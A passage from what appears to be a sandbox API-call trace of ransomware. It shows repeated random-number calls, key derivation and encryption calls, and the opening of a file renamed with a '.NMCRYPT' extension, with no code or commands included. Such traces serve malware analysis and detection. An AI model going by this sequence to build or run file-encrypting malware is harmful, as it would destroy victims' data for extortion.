dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.399] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.400] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.401] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.402] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0147.403] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0147.403] CryptHashData (hHash=0x9ad478, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0147.403] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad838) returned 1 [0147.403] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0147.403] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0147.403] wcslen (_String="\\\\?\\") returned 0x4 [0147.403] CryptDuplicateKey (in: hKey=0x9ad838, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad138) returned 1 [0147.403] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0147.403] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" (normalized: "c:\\program 